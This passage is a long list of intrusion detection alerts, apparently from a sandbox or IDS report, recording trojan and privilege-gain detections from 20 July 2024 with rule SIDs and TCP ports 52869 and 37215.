                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:49.853581
                      SID:2027339
                      Source Port:38300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2027339
                      Source Port:38778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2831300
                      Source Port:35574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2829579
                      Source Port:45864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327719
                      SID:2835222
                      Source Port:39250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.511508
                      SID:2027339
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.486746
                      SID:2027339
                      Source Port:48424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.018794
                      SID:2025132
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.413809
                      SID:2030490
                      Source Port:50122
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2829579
                      Source Port:46300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.411873
                      SID:2025132
                      Source Port:60948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2027339
                      Source Port:34864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.574959
                      SID:2829579
                      Source Port:59976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.520062
                      SID:2027339
                      Source Port:40034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.571724
                      SID:2831300
                      Source Port:49986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2829579
                      Source Port:57322
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2835222
                      Source Port:49362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.384181
                      SID:2025132
                      Source Port:33654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.625646
                      SID:2835222
                      Source Port:39384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.164789
                      SID:2027339
                      Source Port:45522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.424976
                      SID:2829579
                      Source Port:42740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.430184
                      SID:2835222
                      Source Port:36566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441296
                      SID:2027339
                      Source Port:39752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.127169
                      SID:2829579
                      Source Port:47096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:58.157771
                      SID:2025132
                      Source Port:49384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.529818
                      SID:2025132
                      Source Port:54356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2829579
                      Source Port:59260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.773969
                      SID:2027339
                      Source Port:47952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.332694
                      SID:2025132
                      Source Port:42004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.120842
                      SID:2025132
                      Source Port:50658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.355667
                      SID:2027339
                      Source Port:57874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2835222
                      Source Port:37902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2027339
                      Source Port:33526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.181050
                      SID:2027339
                      Source Port:55968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.394269
                      SID:2025132
                      Source Port:44922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.993408
                      SID:2027339
                      Source Port:37872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2025132
                      Source Port:51900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2835222
                      Source Port:47936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.508900
                      SID:2831300
                      Source Port:56982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.304036
                      SID:2027339
                      Source Port:46490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2831300
                      Source Port:47248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.042794
                      SID:2025132
                      Source Port:54424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.628763
                      SID:2027339
                      Source Port:49684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2835222
                      Source Port:37870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.480553
                      SID:2831300
                      Source Port:45826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.037207
                      SID:2027339
                      Source Port:52126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.332387
                      SID:2829579
                      Source Port:45106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.611139
                      SID:2831300
                      Source Port:33898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:53632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.948371
                      SID:2027339
                      Source Port:60336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.137665
                      SID:2025132
                      Source Port:45060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2027339
                      Source Port:49544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2025132
                      Source Port:40094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.363471
                      SID:2831300
                      Source Port:37482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2025132
                      Source Port:41628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.444049
                      SID:2025132
                      Source Port:47050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.404275
                      SID:2027339
                      Source Port:54610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.561842
                      SID:2025132
                      Source Port:44518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.422868
                      SID:2025132
                      Source Port:47588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:56.433850
                      SID:2831300
                      Source Port:40620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.261315
                      SID:2025132
                      Source Port:41306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2027339
                      Source Port:45142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2835222
                      Source Port:56054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2025132
                      Source Port:54392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.955474
                      SID:2027339
                      Source Port:52868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.654274
                      SID:2835222
                      Source Port:51022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.438296
                      SID:2025132
                      Source Port:48352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.066021
                      SID:2027339
                      Source Port:48680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.111365
                      SID:2027339
                      Source Port:40128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.574960
                      SID:2835222
                      Source Port:53752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:19.727778
                      SID:2025132
                      Source Port:53522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2831300
                      Source Port:51880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.804016
                      SID:2027339
                      Source Port:50124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.808671
                      SID:2831300
                      Source Port:41980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:36.472084
                      SID:2831300
                      Source Port:42090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.325933
                      SID:2027339
                      Source Port:42868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.194540
                      SID:2027339
                      Source Port:36092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2027339
                      Source Port:45748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.795331
                      SID:2025132
                      Source Port:58292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.598486
                      SID:2027339
                      Source Port:49766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.544022
                      SID:2027339
                      Source Port:46646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993867
                      SID:2027339
                      Source Port:49580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2027339
                      Source Port:47994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2831300
                      Source Port:52528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:38372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.312606
                      SID:2027339
                      Source Port:37218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:26.028529
                      SID:2027339
                      Source Port:42320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.460726
                      SID:2025132
                      Source Port:57240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.535822
                      SID:2027339
                      Source Port:39732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2831300
                      Source Port:58066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.017676
                      SID:2027339
                      Source Port:48126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.887085
                      SID:2027339
                      Source Port:56916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2027339
                      Source Port:35728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2829579
                      Source Port:55070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.336092
                      SID:2027339
                      Source Port:37698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.139140
                      SID:2027339
                      Source Port:36552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.581336
                      SID:2027339
                      Source Port:40438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.930679
                      SID:2027339
                      Source Port:49380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.234699
                      SID:2835222
                      Source Port:57862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2027339
                      Source Port:60062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.366780
                      SID:2027339
                      Source Port:45676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440397
                      SID:2831300
                      Source Port:58954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.473848
                      SID:2025132
                      Source Port:46622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.412182
                      SID:2027339
                      Source Port:37302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.996824
                      SID:2829579
                      Source Port:60152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.898489
                      SID:2027339
                      Source Port:50158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.546980
                      SID:2025132
                      Source Port:46136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2829579
                      Source Port:35218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2027339
                      Source Port:35490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.359635
                      SID:2025132
                      Source Port:50976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.306586
                      SID:2025132
                      Source Port:48700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:55582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2027339
                      Source Port:60366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:55.227510
                      SID:2027339
                      Source Port:40398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.442578
                      SID:2025132
                      Source Port:35922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.386529
                      SID:2835222
                      Source Port:34926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.210098
                      SID:2025132
                      Source Port:32952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.773172
                      SID:2829579
                      Source Port:51854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.725488
                      SID:2025132
                      Source Port:58874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.645434
                      SID:2027339
                      Source Port:43054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.049331
                      SID:2025132
                      Source Port:34080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2831300
                      Source Port:39054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2831300
                      Source Port:48030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.488342
                      SID:2831300
                      Source Port:36534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2025132
                      Source Port:45708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2835222
                      Source Port:53444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.635185
                      SID:2025132
                      Source Port:47194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2835222
                      Source Port:34146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2027339
                      Source Port:54816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.575243
                      SID:2831300
                      Source Port:54514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.943746
                      SID:2831300
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.235094
                      SID:2027339
                      Source Port:34254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.985482
                      SID:2025132
                      Source Port:51964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2829579
                      Source Port:52532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:48.642445
                      SID:2025132
                      Source Port:39126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.005196
                      SID:2027339
                      Source Port:50148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.854548
                      SID:2025132
                      Source Port:36606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.396094
                      SID:2025132
                      Source Port:53806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.569152
                      SID:2027339
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2831300
                      Source Port:48520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.457187
                      SID:2027339
                      Source Port:34552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.112994
                      SID:2025132
                      Source Port:43694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.549242
                      SID:2025132
                      Source Port:51304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2831300
                      Source Port:55696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.828884
                      SID:2835222
                      Source Port:45738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.768387
                      SID:2027339
                      Source Port:34388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2835222
                      Source Port:57040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.249838
                      SID:2025132
                      Source Port:40838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.742051
                      SID:2025132
                      Source Port:35996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.394050
                      SID:2027339
                      Source Port:44772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:32970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.995876
                      SID:2027339
                      Source Port:60012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2831300
                      Source Port:46072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.978388
                      SID:2027339
                      Source Port:47834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2829579
                      Source Port:52362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.239089
                      SID:2025132
                      Source Port:46442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.738854
                      SID:2027339
                      Source Port:35584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.175472
                      SID:2025132
                      Source Port:34104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.714084
                      SID:2831300
                      Source Port:54992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2835222
                      Source Port:56910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:45368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.346058
                      SID:2025132
                      Source Port:50852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.342827
                      SID:2027339
                      Source Port:34366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.303078
                      SID:2027339
                      Source Port:42878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2025132
                      Source Port:57950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.320815
                      SID:2831300
                      Source Port:42372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.572216
                      SID:2027339
                      Source Port:52144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:41510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.855356
                      SID:2831300
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.913378
                      SID:2831300
                      Source Port:59100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.004179
                      SID:2027339
                      Source Port:37314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.508899
                      SID:2025132
                      Source Port:50718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2835222
                      Source Port:56880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2829579
                      Source Port:58390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.285994
                      SID:2835222
                      Source Port:38978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:41354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.916554
                      SID:2025132
                      Source Port:53166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.117104
                      SID:2025132
                      Source Port:45574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.841638
                      SID:2831300
                      Source Port:57696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:42214
                      Destination Port:37215
                      Protocol:TCP
